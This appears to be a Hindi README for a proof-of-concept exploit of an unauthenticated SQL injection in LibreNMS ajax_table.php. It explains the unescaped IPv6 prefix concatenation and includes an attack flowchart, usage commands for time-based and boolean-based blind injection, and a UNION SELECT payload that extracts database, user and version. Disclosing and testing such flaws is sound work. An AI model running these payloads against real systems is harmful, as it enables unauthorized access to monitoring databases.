
लाइब्रेएनएमएस ajax_table.php में अनप्रमाणित SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अधिकृत सुरक्षा परीक्षण के लिए समय-आधारित और बूलियन-आधारित ब्लाइंड इंजेक्शन तकनीकों का प्रदर्शन करता है।
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:Nsearch_type=ipv6 होने पर address पैरामीटर को / पर पते और प्रीफिक्स में विभाजित किया जाता है।
प्रीफिक्स को बिना एस्केपिंग के सीधे SQL क्वेरी में संयोजित किया जाता है:
$sql .= " AND ipv6_prefixlen = '$prefix'";
प्रीफिक्स भाग में एक सिंगल कोट (') स्ट्रिंग लिटरल से बाहर निकलने की अनुमति देता है → मनमाना SQL इंजेक्शन।
flowchart TD
A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Execute injected query| F[Return results / error / delay]
F -->|6. Attacker observes response / timing| A
subgraph "Injection Point"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests लाइब्रेरी (pip install requests)python3 exploit.py http://target/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ यदि प्रतिक्रिया में >5–6 सेकंड लगते हैं → भेद्य
python3 exploit.py http://target/librenms --boolean
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. मुख्य PoC स्क्रिप्ट (आवश्यकता पड़ने पर cve-2026-26988-poc.py से नाम बदलें)README.md ............... यह फ़ाइल15429580baba... → PR #18777यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस कोड का उपयोग किसी भी सिस्टम या नेटवर्क के विरुद्ध मालिक से स्पष्ट लिखित अनुमति के बिना न करें।
अनधिकृत उपयोग अमेरिका में Computer Fraud and Abuse Act (CFAA) या आपके देश के समकक्ष कानून सहित (लेकिन इन्हीं तक सीमित नहीं) कानूनों का उल्लंघन कर सकता है।
अपने जोखिम पर उपयोग करें।
लेखक: Mohammed Idrees Banyamer
Instagram: @banyamer_security
दिनांक: 20 फरवरी, 2026